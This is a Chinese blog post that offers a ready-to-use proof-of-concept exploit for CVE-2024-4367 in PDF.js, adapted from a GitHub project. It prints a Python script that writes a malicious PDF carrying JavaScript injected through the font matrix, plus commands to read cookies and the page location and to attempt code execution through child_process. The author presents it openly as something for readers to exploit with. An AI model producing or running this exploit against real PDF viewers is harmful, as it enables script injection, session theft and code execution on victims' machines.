51工具盒子该漏洞的具体内容可以去看https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/
已经说的很明白了。我这里就给一下具体利用的POC方便各位利用。
本POC改编于GITHUB项目上的https://github.com/LOURC0D3/CVE-2024-4367-PoC,由于原始项目的 Python 语法存在问题,所以我已经对其进行了修正和优化。
import sys def generate_payload(payload): escaped_payload = payload.replace('(', '\\(').replace(')', '\\)') return f""" %PDF-1.4 %DUMMY 8 0 obj << /PatternType 2 /Shading<< /Function<< /Domain[0 1] /C0[0 0 1] /C1[1 0.6 0] /N 1 /FunctionType 2 >> /ShadingType 2 /Coords[46 400 537 400] /Extend[false false] /ColorSpace/DeviceRGB >> /Type/Pattern >> endobj 5 0 obj << /Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341] /Type/Font /BaseFont/PAXEKO+SourceSansPro-Bold /LastChar 102 /Encoding/WinAnsiEncoding /FontMatrix [0.1 0 0 0.1 0 (1\\);\n{escaped_payload}\n//)] /Subtype/Type1 /FirstChar 65 /FontDescriptor 9 0 R >> endobj 2 0 obj << /Kids[3 0 R] /Type/Pages /Count 1 >> endobj 9 0 obj << /Type/FontDescriptor /ItalicAngle 0 /Ascent 751 /FontBBox[-6 -12 579 713] /FontName/PAXEKO+SourceSansPro-Bold /StemV 100 /CapHeight 713 /Flags 32 /FontFile3 10 0 R /Descent -173 /MissingWidth 250 >> endobj 6 0 obj << /Length 128 >> stream 47 379 489 230 re S /Pattern cs BT 50 500 Td 117 TL /F1 150 Tf /P1 scn (AbCdEf) Tj /P2 scn (AbCdEf) ' ET endstream endobj 3 0 obj << /Type/Page /Resources 4 0 R /Contents 6 0 R /Parent 2 0 R /MediaBox[0 0 595.2756 841.8898] >> endobj 10 0 obj << /Length 800 /Subtype/Type2 >> streamendstream endobj 7 0 obj << /PatternType 1 /Matrix[1 0 0 1 50 0] /Length 58 /TilingType 1 /BBox[0 0 16 16] /YStep 16 /PaintType 1 /Resources<< >> /XStep 16 >> stream 0.65 g 0 0 16 16 re f 0.15 g 0 0 8 8 re f 8 8 8 8 re f endstream endobj 4 0 obj << /Pattern<< /P1 7 0 R /P2 8 0 R >> /Font<< /F1 5 0 R >> >> endobj 1 0 obj << /Pages 2 0 R /Type/Catalog /OpenAction[3 0 R /Fit] >> endobj
xref 0 11 0000000000 65535 f 0000002260 00000 n 0000000522 00000 n 0000000973 00000 n 0000002178 00000 n 0000000266 00000 n 0000000794 00000 n 0000001953 00000 n 0000000015 00000 n 0000000577 00000 n 0000001085 00000 n trailer << /ID[(DUMMY) (DUMMY)] /Root 1 0 R /Size 11 >> startxref 2333 %%EOF """
if name == "main": if len(sys.argv) < 2 or len(sys.argv) > 3: print(f"Usage: {sys.argv[0]} <payload>") print(f"or Usage: {sys.argv[0]} <payload> <filename>") sys.exit(1) payload = generate_payload( sys.argv[1]) out = "poc.pdf" if len(sys.argv) == 3: out = sys.argv[2] with open(out, "w") as f: f.write(payload) print("[+] Created malicious PDF file: " + out) print("[+] Open the file with the vulnerable application to trigger the exploit.") sys.exit(0)
具体的利用如下
尝试写入弹窗
python cve.py "alert('document.domain: '+window.document.domain+'\\nlocation: '+window.location+'\\ncookie: '+window.document.cookie);"
如果有需要换一个文件名的话直接在后面跟文件名即可
Usage: cve.py <payload> <filename>
尝试rce的话可以利用
python cve.py "require('child_process').exec('calc');"
不过目前我没找到客户端所以还没试出来。
